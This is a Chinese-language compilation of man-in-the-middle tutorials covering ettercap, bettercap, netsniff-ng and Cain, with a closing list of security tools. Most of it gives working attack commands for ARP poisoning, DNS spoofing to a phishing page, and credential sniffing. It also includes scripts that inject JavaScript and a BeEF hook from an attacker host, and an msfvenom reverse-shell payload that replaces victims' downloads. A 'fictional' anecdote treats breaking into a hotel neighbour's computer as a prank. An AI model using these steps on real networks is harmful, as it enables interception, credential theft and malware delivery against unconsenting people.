Ettercap的过滤规则只有经过编译之后才能由-F参数载入到ettercap中使用。 编译过滤规则的命令是 etterfilter filter.ecf -o filter.ef。 即把filter.ecf文件编译成ettercap能识别的filter.ef文件。 过滤规则的语法与C类似但只有if语句不支持循环语句。需要注意的地方是if与”(”之间必须要有一个空格且大括号{}不能省略。
Ettercap提供的一些常用的函数有 search(where, what) 从字符串where中查找what若找到则返回true regex(where, regex) 从字符串where中匹配正则表达式regex若找到则返回true replace(what, with) 把字符串what替换成字符串with log(what, where) 把字符串what记录到where文件中 msg(message) 在屏幕上显示出字符串message exit() 退出
快速学习 etterfilter 规则写法多去读已有的一些规则的例子然后按照例子仿写自己的filter。 ettercap 局域网内 DNS 欺骗
https://www.cnblogs.com/hkleak/p/5043063.html
ettercap 是什么 在对 WEB 安全检测的时候都会用到 Cain 和 netfuke 这两款工具功能相信用过的朋友多多少少都知道但这两款工具是在 windows 下运行的。 而 ettercap 是在 linux 下运行的 。其实功能都是差不多的称呼它为嗅探工具ARP欺骗DNS劫持中间人攻击等等。总之这是一款强大的安全测试工具。 DNS 简单说明 了解 DNS是什么Domain Name System (域名系统 简称DNS) 了解DNS欺骗是什么攻击者(黑客)冒充域名服务器进行欺骗的一种行为 了解DNS原理原理如果可以冒充域名服务器然后把查询的IP地址设为攻击者的IP地址 这样的话用户上网就只能看到攻击者的主页而不是用户想要取得的网站的主页了这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站而是冒名顶替、招摇撞骗罢了。 在 linux 下使用 arpspoof 和 dsniff 欺骗的操作如下 首先开启 linux 自带的路由转发功能 编辑 /proc/sys/net/ipv4/ip-forward 文件 echo 1 /proc/sys/net/ipv4/ip_forward 嗅探一个主机和网关之间的所有传输并查看它发送到网络上的双向传输的所有数据。 可以使用如下两条命令 arpspoof -t 192.168.1.1 192.168.1.2 /dev/null arpspoof -t 192.168.1.2 192.168.1.1 /dev/null 打开 dsniff 使用默认的捕获表 dsniff -c -f /usr/share/dsniff/dsniff.services (当然这里你可以自己定制需要捕获端口的规则) 具体写法可以 cat /usr/share/dsniff/dsniff.services 查看编写的规则 Dsniff找到用户名和密码后它会将它们显示在屏幕上。 如果想要停止ARP欺骗输入如下命令killall arpspoof DNS 欺骗举例
(故事纯属虚构)
那是一个夜黑风高的夜晚又是刮风有事闪电的本想在撸几盘撸啊撸搞的我心情一点都不好于是关掉电脑准备睡觉了然而突然啊的一声瞬间把我从困意中拉了回来在仔细一听~~~ 在发现是隔壁宾馆在做爱爱尼玛~~~搞这么大声做什么让我怎么睡觉啊尼玛的决定展开一次入侵隔壁电脑。。。 准备工作 隔壁电脑192.168.1.12 (宾馆一般都装有还原精灵 所以电脑是裸奔(多数没装防火墙) ) //受害者机器 自带笔记本192.168.1.11 (kali linux系统 接上宾馆自己那间房的网线) //入侵者机器 网关IP:192.168.1.1 踩点 怎么知道隔壁的电脑IP地址 先看自己的房间号比如是5-11(假如表示5楼11间房)在来到自己房间看自己电脑的IP地址一般是192.168.1.11 那么隔壁的自己出门去看门牌就知道了(假如是5-12)那么隔壁的IP地址就是192.168.1.12 最后在ping一下 通了 说明电脑开着不同说明电脑关着或者防火墙什么的。。。 这个方法比较死当然其它方法也有根据自己经验而定。。。 首先先打开 ettercap 的 DNS 文件进行编辑在kali下的文件路径为/etc/ettercap/etter.dns 在对应的位置添加对应的 标识和IP地址 * 代表所有域名 后边就是你要欺骗为的IP地址这里是当然是我自己的主机IP地址啦然后记得保存。 再来编辑 /var/www/html/index.html 文件 改成你定义页面 这里我简单的改了下因为后边我们要启动 apache2 也就是网页服务器 这是主页文件说白了目的是为了DNS欺骗成功后当受害者隔壁宾馆两口访问域名访问网站后打开的页面就是我们这里的这个主页文件里边的内容。。。。编辑好了---记得保存
启动 apache 服务systemctl start apache
执行命令 ettercap -G 来进入 ettercap 的图形界面 可以看到列出了所有机器。选择网关进行添加这里的网关是192.18.1.1。 点击 Add to target 1 选择受害者的 IP地址 (隔壁那位妹子的。。。) 点击 Add to target 2 开始 arp 毒化 配置mitm --- arp poisoning 开始 dns 毒化配置plugins --- mangge the plugins 点击 strat --- start sniffing就开始 DNS 欺骗了。隔壁的妹子完事后准备上电脑去逛逛QQ空间 不管打开任何网站页面一直是这样的。。。 ettercap 进行 ARP 欺骗
进入 ettercap 的图形化界面 rootafei:~# ettercap -G #进入ettercap图形化界面 选择网卡 扫描局域网内的主机 查看扫描出的主机 选择目标主机进行ARP欺骗 嗅探靶机图片
driftnet 工具可以监控指定网卡的流量直接显示出流量中的图片例如微信朋友圈和给好友发送的图像据说有同学用来嗅探MM的照片噢方法并不是100%成功稍微测试好玩还是不错的。 ettercap 实现 DNS劫持 和 arp欺骗
攻击机:192.168.40.128 钓鱼网站192.168.40.128 目标机192.168.40.129
修改配置文件vim /etc/ettercap/etter.dns 配置钓鱼网站打开 apachesystemctl start apache2
打开ettercap发动攻击 网关添加到 target目标机添加到 target2 target 里的内容也可以对换 开始 arp 欺骗 开始 DNS 劫持 然后目标机随便打开一个网站 显示 apache 的首页则表示成功了当然也可以自行修改 web 服务器里要显示的内容。不过要注意的是如果地址里输入的是https则无法显示网页。 ICMP 欺骗
icmp 欺骗icmp欺骗即基于重定向redirect的路由欺骗技术。其基本原理是欺骗其他的主机将自身伪装为最近的路由因此其他主机会将数据包发送进来然后作为中间人的攻击者再重新将其转发到真正的路由器上。于是我们便可以对这些数据包进行监听。当然icmp欺骗不适用于交换机的环境若本机在交换机的环境下则最好选择arp毒化的方式来进行攻击。icmp欺骗方式的参数是真实路由器的MAC和IP参数形式为(MAC/IP)。
示例ettercap -M icmp:00:11:22:33:44:55/192.168.0.1
示例ettercap -i eth0 -T -M icmp:00:11:22:33:44:55/10.0.0.1真实网关的MAC/IP DHCP 欺骗
DHCP spoofingDHCP 欺骗的原理是将攻击者的本机伪装成DHCP服务器代替真实的DHCP服务器给新接入网络的受害主机动态分配IP。这样的缺点是可能会与真实的DHCP服务器重复分配IP造成冲突而且只能针对新接入网段的主机难以影响到之前的主机。DHCP spoofing 方式的参数是可以分配出去的IP地址池、子网掩码和DNS参数形式为(ip_pool/netmask/dns)。 示例ettercap -i eth0 -T -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1 说明将分配 192.168.0.303550-60 之中的地址子网掩码为255.255.255.0DNS服务器为192.168.0.1。 Port Stealing ( Port 欺骗 )
此方式适用的环境为交换机下且路由器中 IP 和 MAC 绑定从而使 ARP 欺骗无效。其基本思想是既然无法欺骗路由器的IP和MAC对应关系那么就欺骗交换机使原本应该通过交换机端口到达目标主机的数据包被传入了攻击者的端口。需要指出的是由于这个方法只用于交换机环境且会产生大量的数据包可能会严重影响网络状况。
示例ettercap -i eth0 -T -M port /1.1.1.1/ /1.1.1.2/ Ndp 欺骗
ettercap -i eth0 -T -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/ 5、bettercap 官网https://www.bettercap.org/ github 地址https://github.com/bettercap/bettercap 文档https://www.bettercap.org/modules/
提到中间人攻击最知名的莫过于 Ettercap但是由于 Ettercap 过滤器太复杂扩展开发需要掌握C/C语言同时在大型网络环境中 Ettercap 的主机发现以及欺骗功能效果较差于是就诞生了 Bettercap。Bettercap 是一个非常强大、灵活可移植的中间人攻击框架它具有跨平台、轻量级以及模块化等优点在渗透测试过程中能够非常好的进行中间人测试。
kali 安装 命令sudo apt install bettercap
工具包含以下主要特性
1、全双工和半双工的 ARP 欺骗。2、真正的 ICMP 双向欺骗。3、可配置的 DNS 欺骗。4、实时和完全自动化地主机发现。5、实时获取通信协议中的安全凭证包括 HTTPs中的 Post 数据Basic 和 Digest 认证 FTP, IRC, POP, IMAP, SMTP, NTLM (HTTP, SMB, LDAP, etc) 以及更多。6、完全可定制的网络嗅探器。7、模块化的 HTTP 和 HTTPS 透明代理支持将用户以及内置的插件注入到目标的 HTML 代码JS 或 CSS 文件以及 URLs 中。8、使用 HSTS bypass 技术拆封 SSL。9、内置 HTTP 服务器。使用 bettercap # 开启 bettercap默认是开启的 eth0 网卡
rootkali:~# bettercap // 开启其他网卡比如无线网卡 wlan0可以 bettercap -iface wlan0 执行命令 bettercap 后就会列出局域网中存活的主机。( 如果没有看下主机发现模块有没有打开如果没有执行打开命令net.recon on )
帮助在启用 Bettercap 时可以通过 -h 获取帮助信息。 输入help 或者 可以查看 bettercap 的各个模块绿色表示启用红色表示未启用 help 模块名 可以查看模块的具体参数和作用。比如help net.recon 常用命令 help 模块名称 显示指定模块的帮助 active 显示当前运行中的模块的信息 quit 结束会话并退出 sleep 秒数 休眠指定的秒数和shell中的sleep一样 get 变量 获取变量的值 set 变量值 设置变量的值。有些模块有自定义变量 比如可用net.sniff.output变量指定嗅探器的输出的保存路径 read 变量提示 显示提示来让用户输入输入内容会被储存在变量中 clear 清屏 include CAPLET 在当前会话读取并运行这个caplet !命令 运行相应的shell命令并显示输出 alias MAC地址 别名 给MAC地址设置一个别名 常用模块 api.rest # RESTful API模块 ble.recon # 低功耗蓝牙设备发现模块 dhcp6.spoof # dhcp6欺骗模块(伪造DHCP数据包篡改客户端的DNS服务器因此需要与dns.spoof一并启用) events.stream # 串流输出模块就是不断地在终端界面刷出程序的输出例如arp截获的信息 wifi # wifi模块有deauth攻击wifi杀手和创建软ap的功能 net.recon # 该模块负责定期读取系统 ARP 表以检测局域网内存活的主机 net.probe # 探测局域网内存活主机 net.sniff # 该模块是一个网络数据包嗅探器 arp.spoof # arp欺骗模块。使用ARP数据包不断欺骗网络上的选定主机以执行中间人攻击 dns.spoof # DNS欺骗模块。使用欺骗响应回复 DNS 查询 http.proxy # 可以使用 javascript 模块编写脚本的全功能 HTTP 透明代理。如果与一个一起使用欺骗者所有 HTTP 流量都将重定向到它它会根据需要自动处理端口重定向 等等还有其他的 实战应用 --- ARP 欺骗、DNS 欺骗、注入脚本 https://blog.csdn.net/whoim_i/article/details/104388168 ARP 欺骗 bettercap 中的 arp.spoof 不能起作用时可以用 arpspoof 代替的 中间人攻击中最常用的就是 ARP 欺骗了接下来我们使用 bettercap 来进行 ARP 欺骗熟悉一下arp.spoof 这个模块。
首先输入help arp.spoof 查看下这个模块的帮助信息 arp.spoof on : 开启ARP欺骗 arp.ban on 开启ARP欺骗用ban模式即目标将不能上网也就是断网攻击 arp.spoof off 停止ARP欺骗 arp.ban off : 停止ARP欺骗 # 参数 arp.spoof.internal 如果为true那么网络中的计算机之间的本地连接将被欺骗否则只能连接到来自外部网络(默认为false) arp.spoof.targets 要欺骗的目标可以是 ip 、mac 或者 别名 也可以支持nmap形式的ip区域 arp.spoof.whitelist 白名单就是不欺骗的目标可以是ip、mac或者别名 对于参数可以使用 set 来设置使用 get 来获取 # 设置攻击目标可以是一个网段如192.168.100.1-20 多个地址使用逗号隔开。留空则默认为欺骗整个网段所有主机。否则仅对指定的目标进行欺骗。 set arp.spoof.targets 192.168.100.2 get arp.spoof.targets # 获取 arp.spoof.targets 的值 设置好参数后就可以开启 ARP 欺骗 arp.spoof on 验证 通过 net.sniff 可以嗅探到目标机的浏览数据 通过 wireshark 抓包可以发现大量的来自目标机的流量 查看目标机的 arp 缓存表发现网关的 mac 已经被修改为 kali攻击机的mac DNS 欺骗
DNS欺骗有一个前提就是局域网内的主机的DNS服务器是局域网的网关才能进行欺骗。如果是公网的DNS就不行了。 DNS欺骗之前我们需要利用ARP欺骗让目标机认为网关就是我们攻击机所以主机就会向我们发送DNS请求这样就可以进行DNS欺骗了。
首先进行 ARP 欺骗 set arp.spoof.targets 192.168.100.2 arp.spoof on 然后进行 DNS 欺骗 # 设置要欺骗的域名多个域名用逗号隔开如果要欺骗所有域名用通配符 * set dns.spoof.domains www.sina.com # 设置将要欺骗的域名转换成的ip # 可以设置成我们自己的服务器里面写上一个假的网站做些不可描述的东西 set dns.spoof.address 172.20.10.12 # 开启DNS欺骗 dns.spoof on 如图所示ping www.sina.com 时目标机直接向我们发起请求。打新浪首页进入的是我们自己的网站。 为了避免代码的重复还可以打开 bettercap 的目录创建一个host文件文件中存放要欺骗的域名和地址然后在进行DNS欺骗的时候只需要设置arp.spoof.hosts这个参数就行了。比如创建一个host 文件如下 进行 DNS 欺骗的时候只需要设置 arp.spoof.hosts 这个参数就行了 set dns.spoof.hosts /root/host #设置欺骗的域名和对应ip dns.spoof on #开启dns欺骗 注入脚本
通过进行ARP欺骗可以拦截到流量自然就可以对拦截到的流量进行操作我们可以对 http 协议的数据包进行代理然后向里面注入恶意脚本。 set arp.spoof.targets 172.20.10.13 #设置arp欺骗的目标 arp.spoof on #开启ARP欺骗 set http.proxy.script /root/1.js #注入恶意脚本 set https.proxy.script /root/1.js http.proxy on # 开启HTTP代理 https.proxy on 脚本文件 1.js 如下
function onload(){log(Bettercap loaded);log(targets: env[arp.spoof.targets]);
}
function onResponse(req, res){if(res.ContentType.indexOf(text/html) 0){var body res.ReadBody();log(Inject js!!!);if(body.indexOf(/head) ! -1){res.body body.replace(/head,scripta;ert(/1/)/script);}}
}
function onResponse(req,res){if(res.ContentType.indexOf(text/html)0){var bodyres.ReadBody();if(body.indexOf(/head)!-1){res.Bodybody.replace(/head,script typetext/javascriptalert(your computer has hacked!)/script/head);}}
}当目标机访问一个http或者https协议的站点时就可以看到脚本已经注入到请求的网站。 结合 beef-xss 注入
既然我们可以注入js脚本那么我们就可以利用beef来对目标浏览器进行控制。 set arp.spoof.targets 172.20.10.13 #设置arp欺骗的目标 set http.proxy.script /root/test.js #往http流量中注入脚本/root/test.js set http.proxy.sslstrip true #启用SSL剥离 http.proxy on #开启HTTP代理 arp.spoof on #开启ARP欺骗 test.js 内容如下
function onResponse(req,res){if(res.ContentType.indexOf(text/html)0){var bodyres.ReadBody();if(body.indexOf(/head)!-1){res.Bodybody.replace(/head,script typetext/javascript srchttp://172.20.10.2:3000/hook.js/script/head);}}
}kali 之 beef 的使用https://blog.csdn.net/whoim_i/article/details/102877616 导入 cap 格式 的 命令文件避免重复输入命令
在 bettercap 中有一种文件后缀叫 .cap 我们启动 bettercap 的时候可以指定该.cap文件就可以按照这个文件还原命令。比如随便创建一个 xss.cap 文件内容如下 加载并执行 xss.cap 的命令rootkali:~# bettercap -caplet xss.cap
使用 active 可以详细的查看框架的变量及开启的模块。
在新的版本中还加入了caplets使用 caplets.update 下载更新后会存储由由开发者编写的各种功能的模块脚本。我们可以通过 caplets.show 来查看有哪些.cap模块。 其中的模块功能可满足中间人攻击的大部分场景。 演示通过中间人攻击获取目标网站登录密码以及替换下载文件。
http-req-dump 模块能够欺骗内网流量走本地透明代理并输出内容在Bettercap中启用该模块。模块默认启用ARP欺骗欺骗对象为内网所有主机使用目标登录百度。 目标点击登录后控制台会直接输出用户输入的内容。 使用 msf 生成一个 payload 替换掉 caplets 中的文件。命令rootkali:/usr/share/bettercap/caplets/download-autopwn/windows# msfvenom -p windows/meterpreter/reverse_tcp lhost172.20.10.2 lport8888 -f exe -o payload.exe download-autopwn 文件可以保存着一些脚本使用 mv 把生成的木马后门放进去然后启用这个文件。当被欺骗者下载任意文件时都会被替换成我们的后门。
使用 Downloadautopwn 模块。命令rootkali:~# bettercap -caplet download-autopwn/download-autopwn 或者 进入 bettercap 执行 download-autopwn 键入模块名会自动设置变量及脚本在靶机上下载任意可执行文件文件都会被替换为后门文件。 在进行下载文件替换时Payload与目标所下载文件大小不一致此时可通过set downloadautopwn.resizepayload true设置自动调整Payload大小。 6、netsniff-ng --- 网络嗅探利器 netsniff-ng github 地址https://github.com/netsniff-ng/netsniff-ng
帮助 (root㉿kali)-[~] netsniff-ng -h netsniff-ng 0.6.8, the packet sniffing beast http://www.netsniff-ng.org Usage: netsniff-ng [options] [filter-expression] Options: -i|-d|--dev|--in dev|pcap|- 输入源可以为 netdev, pcap 或者 pcap stdin -o|--out dev|pcap|dir|cfg|- 输出可以为 netdev, pcap, directory, trafgen, 或者 stdout -C|--fanout-group id Join packet fanout group -K|--fanout-type type Apply fanout discipline: hash|lb|cpu|rnd|roll|qm -L|--fanout-opts opts Additional fanout options: defrag|roll -f|--filter bpf-file|-|expr Use BPF filter from bpfc file/stdin or tcpdump-like expression -t|--type type Filter for: host|broadcast|multicast|others|outgoing -F|--interval size|time Dump interval if -o is a dir: numKiB/MiB/GiB/s/sec/min/hrs -R|--rfraw Capture or inject raw 802.11 frames -n|--num 0|uint Number of packets until exit (def: 0) -P|--prefix name Prefix for pcaps stored in directory -O|--overwrite N Limit the number of pcaps to N (file names use numbers 0 to N-1) -T|--magic pcap-magic Pcap magic number/pcap format to store, see -D -w|--cooked Use Linux cooked header instead of link header -D|--dump-pcap-types Dump pcap types and magic numbers and quit -B|--dump-bpf Dump generated BPF assembly -r|--rand Randomize packet forwarding order (dev-dev) -M|--no-promisc No promiscuous mode for netdev -A|--no-sock-mem Dont tune core socket memory -N|--no-hwtimestamp Disable hardware time stamping -m|--mmap Mmap(2) pcap file I/O, e.g. for replaying pcaps -G|--sg Scatter/gather pcap file I/O -c|--clrw Use slower read(2)/write(2) I/O -S|--ring-size size Specify ring size to: numKiB/MiB/GiB -k|--kernel-pull uint Kernel pull from user interval in us (def: 10us) -J|--jumbo-support Support replay/fwd 64KB Super Jumbo Frames (def: 2048B) -b|--bind-cpu cpu Bind to specific CPU -u|--user userid Drop privileges and change to userid -g|--group groupid Drop privileges and change to groupid -H|--prio-high Make this high priority process -Q|--notouch-irq Do not touch IRQ CPU affinity of NIC -s|--silent Do not print captured packets -q|--less Print less-verbose packet information -X|--hex Print packet data in hex format -l|--ascii Print human-readable packet data -U|--update Update GeoIP databases -V|--verbose Be more verbose -v|--version Show version and exit -h|--help Guess what?! 示例 : netsniff-ng --in eth0 --out dump.pcap -s -T 0xa1b2c3d4 --bind-cpu 0 tcp or udp netsniff-ng --in wlan0 --rfraw --out dump.pcap --silent --bind-cpu 0 netsniff-ng --in dump.pcap --mmap --out eth0 -k1000 --silent --bind-cpu 0 netsniff-ng --in dump.pcap --out dump.cfg --silent --bind-cpu 0 netsniff-ng --in dump.pcap --out dump2.pcap --silent tcp netsniff-ng --in eth0 --out eth1 --silent --bind-cpu 0 -J --type host netsniff-ng --in eth1 --out /opt/probe/ -s -m --interval 100MiB -b 0 netsniff-ng --in vlan0 --out dump.pcap -c -u id -u bob -g id -g bob netsniff-ng --in any --filter http.bpf --jumbo-support --ascii -V Note: For introducing bit errors, delays with random variation and more while replaying pcaps, make use of tc(8) with its disciplines (e.g. netem). (root㉿kali)-[~] 7、Cain 官网地址https://cain-abel.en.softonic.com 官方关闭了下载通道github 地址https://github.com/xchwarze/Cain cain abel v4.9.46 简体中文版http://www.downcc.com/soft/24269.html cain abel(多口令破解工具) v4.9.89 英文http://www.downcc.com/soft/13783.html Cain abel 是一个知名的 windows平台免费口令破解器它不像 Ettercap 那么多选项号称穷人使用的 L0phtcrack。它的功能十分强大可以网络嗅探网络欺骗破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议甚至还可以监听内网中他人使用VOIP拨打电话。它可以帮助您破解遗忘的各种密码。它能通过网络嗅探很容易的恢复多种口令能使用字典破解加密的口令暴力口令破解录音VOIPIP电话谈话内容解码编码化的口令获取无线网络密钥恢复缓存的口令分析路由协议等。为了帮助大家对工具的使用进行了解特别发布这篇教程需要说明的是请勿非法使用软件否则后果自负
Cain Abel 是一个可以 crack 屏保PWL密码共享密码缓存口令远程共享口令SMB口令支持VNC口令解码Cisco Type-7口令解码Base64口令解码sql server 7.0/2000口令解码Remote Desktop口令解码access Database口令解码Cisco PIX Firewall口令解码Cisco MD5解码NTLM Session Security口令解码IKE Aggressive Mode Pre-Shared Keys口令解码Dialup口令解码远程桌面口令解码等综合工具还可以远程crack可以挂字典以及暴力crack其sniffer功能极其强大几乎可以明文捕获一切帐号口令包括FTPHTTPIMAPPOP3SMBTELNETVNCTDSSMTPMSKERB5-PREAUTHMSNRADIUS-KEYSRADIUS-USERSICQIKE Aggressive Mode Pre-Shared Keys authentications等。
CAIN 下有两个程序一个是CAIN主程序一个是Abel服务程序。Abel服务程序需要手动进行安装。Abel 是后台服务程序一般不会用到下面介绍 Cain 的使用。
程序由以下文件组成
Cain.exe 主程序 Causermanual.chm 用户手册 Abel.exe 名为 abel 的 windows 服务 Abell.dll 程序支持文件 Wordlist.txt 小型口令文件 Install.log 程序安装目录 Oui.txtmac 地址厂商文件
安装目录\winrtgen\winrtgen.exe 字典生成器 安装目录\winrtgen\charset.txt 字符集文件 安装目录\driver\winpcap_4_0_beta2.exe 原始winpcap驱动程序
正确安装 CAIN 后从 CAIN 目录下拷贝 Abel.exe 和 Abel.dll 到 C:\Windows\System32目录下运行 Abel.exe 安装并在服务里设置为自动启动运行 CAIN主界面如图所示。 Cain 的嗅探器
嗅探器 (包含局域网的嗅探 和 ARP欺骗) 是 Cain 的重点很多人用 Cain 主要就是用这个嗅探器和 ARP欺骗。Cain 中的嗅探器主要嗅探局域网内的有用信息比如各类密码等。Cain 中的 ARP 的欺骗原理是操纵两台主机的 ARP 缓存表以改变它们之间的正常通信方向这种通信注入的结果就是 ARP 欺骗攻击利用 ARP 欺骗可以获得明文的信息。
程序配置首先点击菜单的配置按钮
首先选择用于嗅探的以太网卡(可以是有线网卡也可以是无线网卡)本文中将选择第二个无线网卡。下面的选项可以不选。然后转到ARP欺骗选项卡。欺骗选项中可以用真实的IP地址也可以使用伪装IP地址和的MAC。
但是使用伪装IP和MAC有几个前提条件
1.攻击者的机器 只能连接在 HUB 中不能连接在交换机中 2. 设置的IP地址需是子网内的合法的而且是未使用的IP地址预欺骗ARP缓存勾选下面默认每30秒发送一次ARP欺骗包。XP系统每2分钟更新ARP 缓存因此设置太大就不能达到欺骗的效果设置太小会产生太多的ARP流量Cain 使用教程 CAIN 使用教程https://www.jianshu.com/p/facff81a4826 Cain 使用教程详细版https://www.jianshu.com/p/2902777609b3 CAIN ( 扫描、嗅探、破解 ) 使用教程https://wenku.baidu.com/view/57cb0722192e45361066f5e9.html 少侠选个趁手的兵器吧 | 网络安全从业人员工具集 扫描 / 渗透测试
OpenVAS一个由多个服务和工具组成的框架提供了全面而强大的漏洞扫描和漏洞管理解决方案功能。Metasploit Framework优秀的网络安全工具之一用于针对远程目标计算机开发和执行漏洞利用代码。其他重要的子项目包括opcode数据库shellcode存档和相关研究。KaliKali Linux是Debian衍生的Linux发行版专为数字取证和渗透测试而设计。Kali Linux预先安装了许多渗透测试程序包括nmap(端口扫描程序)Wireshark(数据包分析器)John the Ripper(密码破解程序)和Aircrack-ng(用于渗透测试无线局域网的软件套件)。pig 一个Linux数据包制作工具。Scapy一款强大的交互式数据包处理工具、数据包生成器、网络扫描器、网络发现工具和包嗅探工具。它提供多种类别的交互式生成数据包或数据包集合、对 数据包进行操作、发送数据包、包嗅探、应答和反馈匹配等等功能。Pompem一个开源的网络安全工具旨在自动搜索主要数据库中的漏洞。在Python中开发有一个高级搜索系统从而帮助渗透测试人员和白帽子的工作。在当前版本中在数据库中执行搜索Exploit-db1337dayPacketstorm Security…Nmap一个用于网络开发和安全审计的免费开源实用程序。
监控 / 记录
justniffer是一种网络协议分析工具可以捕获网络流量并以自定义方式生成日志可以模拟Apache Web服务器日志文件跟踪响应时间并从HTTP流量中提取所有“被拦截”的文件。httpry是一种专用的数据包嗅探工具用于捕获HTTP数据包并将HTTP协议层的数据内容以可读形式列举出来。它的目的不是执行分析而是捕获、解析和记录流量以便以后进行分析。它可以实时运行显示解析后的流量也可以作为记录到输出文件的守护进程运行。ngrep是一个功能强大的网络数据包分析工具它是一种应用于网络层的类似grep的工具它匹配通过网络接口传递的流量。ngrep是一个pcap感知工具可让您指定扩展的正则表达式或十六进制表达式以便与数据包的数据有效载荷匹配。它目前可识别以太网PPPSLIPFDDI令牌环、IPv4 / 6TCPUDPICMPv4 / 6IGMP和Raw并以常见的数据包嗅探工具(如tcpdump和snoop)相同的方式理解BPF过滤器逻辑。Passivedns比较好的网络安全工具之一可以被动地收集DNS记录以协助事件处理网络安全监视(NSM)和常规数字取证。PassiveDNS会从接口嗅探流量或读取pcap文件然后将DNS服务器响应输出到日志文件。PassiveDNS可以在内存中缓存/聚合重复的DNS应答从而限制日志文件中的数据量而不会丢失DNS响应中的信息。sagan是一个多线程、实时系统和事件日志监视软件。Sagan使用了类似于Snort的规则集检测网络或系统中的危险事件。Node Security Platform与Snyk功能相似但在大多数情况下是免费的而对于临时使用的用户来说非常划算。ntopng是一个网络流量探测工具是原ntop的下一代版本ntop是基于Libpcap和它被写在一个可移植的方式来运行在UNIX平台上MacOSX和Win32一样。Fibratus是Windows内核漏洞跟踪和测试工具。它能够捕获大部分Windows内核活动-进程/线程创建和终止文件系统I / O注册表网络活动DLL加载/卸载等等。Fibratus有一个非常简单的CLI它封装了用于启动内核流式事件处理收集器设置内核事件过滤器或运行轻量级Python模块filters的工具。
IDS / IPS /主机IDS /主机IPS
Snort是Martin Roesch于1998年创建的免费开放源代码网络入侵防御系统(NIPS)和网络入侵检测系统(NIDS)。Snort现在由Sourcefire开发而Roesch是Sourcefire的创始人兼CTO。2009年Snort作为“有史以来最伟大的开源软件之一”进入InfoWorld的开源榜单。Bro是一个功能强大的网络分析工具与您可能知道的典型IDS有很大不同。OSSEC是一款开源的入侵检测系统。使用前需要花点时间了解它的工作原理。执行日志分析文件完整性检查策略监视rootkit检测实时警报和主动响应。它可以在大多数操作系统上运行包括LinuxMacOSSolarisHP-UXAIX和Windows。Suricata是高性能的网络IDSIPS和网络安全监视引擎。Suricata项目和代码由开放信息安全基金会(OISF)拥有和支持OISF是一个非盈利基金会致力于确保Suricata作为一个开源项目的开发和持续成功。Security Onion是入侵检测系统网络安全监视和日志管理的Linux发行版。它基于Ubuntu包含SnortSuricataBroOSSECSguilSquitSnorbyELSAXplicoNetworkMiner和许多其他安全工具。镜像可以作为传感器分布在网络中以监控多个VLAN和子网。sshwatch – SSH的IPS类似于用Python编写的DenyHosts。它还可以在日志中收集攻击期间攻击者的信息。Stealth文件完整性检查程序。控制器从另一台计算机上运行这使攻击者很难知道正在通过SSH以定义的伪随机间隔检查文件系统。强烈建议用于中小型部署。AIEngine下一代交互式/可编程Python / Ruby / Java / Lua和Go网络入侵检测系统引擎具有学习功能无需人工干预DNS域分类垃圾邮件检测网络收集器网络取证等等。DenyhostsDenyHosts是Python语言写的一个程序它会分析sshd的日志文件(/var/log/secure)当发现重 复的攻击时就会记录IP到/etc/hosts.deny文件从而达到自动屏IP的功能。Fail2Ban扫描系统日志文件并对显示恶意行为的IP采取措施。SSHGuard用C语言编写的用于保护除SSH之外的服务的软件Lynis是一个为系统管理员提供的 Linux和Unix的审计工具 。
蜜罐
HoneyPy 是一种中低互动的蜜罐。它易于实现部署使用插件扩展功能以及应用自定义配置。Dionaea是nepenthes的继承者将python作为脚本语言嵌入使用libemu检测shellcode支持ipv6和tls。Conpot是一个部署在服务端的低交互ICS蜜罐易于部署、修改和扩展。开发者通过提供一系列的通用工控协议使得我们能够非常快速地在我们的系统上构建一套复杂的工控基础设施用于欺骗未知的攻击者。Amun基于Amun Python的低交互蜜罐。Glastopf是一个Web应用漏洞蜜罐软件以从针对Web应用程序的攻击中收集数据。它可以对例如结构化查询语言注入(SQLI)远程代码执行(RCE)本地文件包含(LFI )远程文件包含(RFI)等攻击行为进行记录。Kippo是一种中等交互性SSH蜜罐旨在记录暴力攻击最重要的是记录攻击者执行的整个shell交互。Kojoney是一个模拟SSH服务器的低交互蜜罐。守护进程是用Python编写的使用Twisted Conch库。HonSSH是一种高交互的蜜罐解决方案。HonSSH将位于攻击者和蜜罐之间从而可以创建两个独立的SSH链接Bifrozt是一个带有DHCP服务器的NAT设备通常部署一个NIC直接连接到Internet一个NIC连接到内部网络。Bifrozt与其他标准NAT设备的区别在于它能够在攻击者和蜜罐之间作为透明的SSHv2代理工作。HoneyDrive是一款Linux蜜罐系统。它是以虚拟设备(OVA)的方式安装在Xubuntu 12.04.4版本上面。它包含10多个预安装和预配置的蜜罐软件例如Kippo SSH honeypotDionaea、Amun malware honeypotsHoneyd low-interaction honeypotGlastopf web honeypotWordpotConpot SCADA/ICS honeypotThugPhoneyC honeyclients等。Cuckoo Sandbox是一个开源软件用于自动分析可疑文件。 为此它使用自定义组件来监视恶意进程在隔离环境中运行时的行为。
抓包 工具
tcpflow是一个免费的开源的功能强大的基于命令行的工具它捕获作为TCP连接(流)的一部分传输的数据并以便于协议分析和调试的方式存储数据。Xplico是一个从 pcap 文件中解析出IP流量数据的工具。可解析每个邮箱 (POP, IMAP, 和 SMTP 协议)所有 HTTP 内容VoIP calls (SIP) 等等。Xplico并不是网络协议分析器。Xplico是一个开源的网络取证分析工具(NFAT)。Moloch是一个开源的大规模IPv4数据包捕获(PCAP)索引和数据库系统。为PCAP浏览、搜索和导出提供了一个简单的web界面。公开了允许直接下载PCAP数据和JSON格式会话数据的api。简单的安全性是通过使用HTTPS和HTTP摘要密码支持来实现的或者是通过在前面使用apache来实现的。Moloch并不打算取代IDS引擎而是与它们一起工作以标准PCAP格式存储和索引所有网络流量提供快速访问。Moloch被构建成可以跨多个系统部署并且可以扩展到处理多个千兆位/秒的流量。OpenFPC是一组工具它们结合在一起提供一个轻量级的全包网络流量记录器和缓冲系统。它的设计目标是允许非专业用户在COTS硬件上部署分布式网络流量记录器同时集成到现有的警报和日志管理工具中。Dshell是一个网络取证分析框架。支持插件的快速开发以支持对网络数据包捕获的分析。stenographer是一个全包捕获实用程序用于将数据包缓冲到磁盘以便进行入侵检测和事件响应。
嗅探 工具
